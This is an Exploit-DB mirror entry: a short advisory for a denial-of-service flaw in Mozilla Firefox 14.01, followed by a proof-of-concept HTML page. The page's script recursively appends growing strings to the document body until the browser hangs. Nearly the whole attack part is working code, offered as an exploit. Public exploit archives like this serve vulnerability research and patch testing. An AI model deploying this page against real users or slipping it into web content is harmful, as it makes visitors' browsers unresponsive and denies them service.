exploit-db-mirror/exploits/multiple/dos/37639.html
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

23 lines
No EOL
466 B
HTML

source: https://www.securityfocus.com/bid/55091/info
Mozilla Firefox is prone to a remote denial-of-service vulnerability.
An attacker can exploit this issue to make the affected computer unresponsive, denying service to legitimate users.
Mozilla Firefox 14.01 is affected; prior versions may also be affected.
<html>
<head>
<title></title>
</head>
<body></body>
<script>
function e(x)
{
document.body.innerHTML += x;
e(x + 'x');
};
e('x')
</script>
</html>